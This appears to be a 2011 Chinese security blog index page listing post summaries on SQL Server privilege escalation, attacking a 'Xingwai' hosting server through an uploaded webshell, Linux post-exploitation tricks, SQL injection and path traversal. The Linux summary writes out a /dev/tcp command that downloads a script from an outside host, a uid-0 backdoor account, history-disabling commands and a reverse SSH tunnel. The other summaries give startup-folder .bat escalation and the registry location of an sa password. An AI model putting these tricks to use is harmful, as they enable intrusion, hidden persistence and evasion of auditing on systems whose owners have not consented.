2011年3月24日

DB_OWNER或SA权限备份bat到启动项提权

摘要: 下面只给出关键的代码:使用查询分析器或者webshell连接上数据库后按如下步骤操作即可:1.DB权限列目录exec master..xp_dirtree 'c:\',1,1使用以上语句可以实现db权限下列出磁盘目录下面我们用备份的方式来备份一个BAT到启动项里----------------------------------------------------------------------------------------------------------------------------------------------------------------- 阅读全文

posted @ 2011-03-24 22:12 =_=! 阅读(372) 评论(0) 推荐(0) 编辑

对星外主机提权利用

摘要: T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外对新手来说在这里很容易陷入困境!星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下M 阅读全文

posted @ 2011-03-24 22:10 =_=! 阅读(1070) 评论(0) 推荐(0) 编辑

linux渗透小技巧

摘要: 1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=0export HISTFILE=/dev/null4.SSH反向链接ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指 阅读全文

posted @ 2011-03-24 20:21 =_=! 阅读(373) 评论(0) 推荐(0) 编辑

SQL注入

摘要: 定义: SQL注入攻击(SQL injection,台湾称作SQL资料隐码攻击),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 有部份人认为SQL注入攻击是只针对Microsoft SQL Server而来,但只要是支持批次处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 优秀文章推荐: 维基百科上的SQL注入文章 >> http://en.wikipedia.org/wiki/SQL_injectio 阅读全文

posted @ 2011-03-24 01:43 =_=! 阅读(440) 评论(0) 推荐(0) 编辑

目录/路径遍历

摘要: 基本定义: 目录遍历(或路径遍历)(directory traversal/path traversal)是由于Web服务器或Web应用程序对用户输入文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过HTTP请求和利用一些特殊字符就可以绕过服务器的安全限制,访问任意受限的文件(可以是Web根目录以外的文件),甚至执行系统命令。可能导致路径遍历一些特殊字符:.. ..\ ../ %2e%2e%2f which translates to ../ %2e%2e/ which translates to ../ ..%2f which translates to ../ %2e%2e%5c 阅读全文

posted @ 2011-03-24 01:39 =_=! 阅读(1181) 评论(0) 推荐(0) 编辑

导航